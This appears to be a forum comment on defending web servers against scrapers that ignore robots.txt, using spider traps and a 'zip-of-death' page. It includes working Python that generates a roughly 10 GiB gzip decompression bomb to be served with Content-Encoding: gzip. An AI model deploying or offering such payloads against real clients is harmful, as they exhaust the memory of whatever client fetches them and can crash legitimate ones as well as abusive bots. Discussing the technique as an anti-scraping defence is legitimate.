Some run git over SSH, with a domain login required for HTTPS access, permission management, etc.
Also, spider traps and 42 TB zip-of-death pages work well on poorly written scrapers that ignore robots.txt =3
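For the curious, a zip-of-death page is just a tiny, highly compressible payload that balloons when the client decompresses it; the usual trick is serving it with Content-Encoding: gzip from a trap URL. A minimal sketch in Python for generating one (the file name, sizes, and serving details here are illustrative, not a specific deployment):

```python
import zlib

def make_gzip_bomb(path="bomb.gz", gib=10):
    # wbits=31 selects the gzip container instead of raw deflate
    comp = zlib.compressobj(9, zlib.DEFLATED, 31)
    chunk = b"\0" * (1024 * 1024)  # 1 MiB of zeros; compresses roughly 1000:1
    with open(path, "wb") as f:
        for _ in range(gib * 1024):  # feed `gib` GiB of zeros through the compressor
            f.write(comp.compress(chunk))
        f.write(comp.flush())

make_gzip_bomb()  # ~10 GiB decompressed from a file of only a few MiB
```

A well-behaved client caps decompressed size or streams with a limit; a naive scraper that slurps the whole response into memory does not, which is the point.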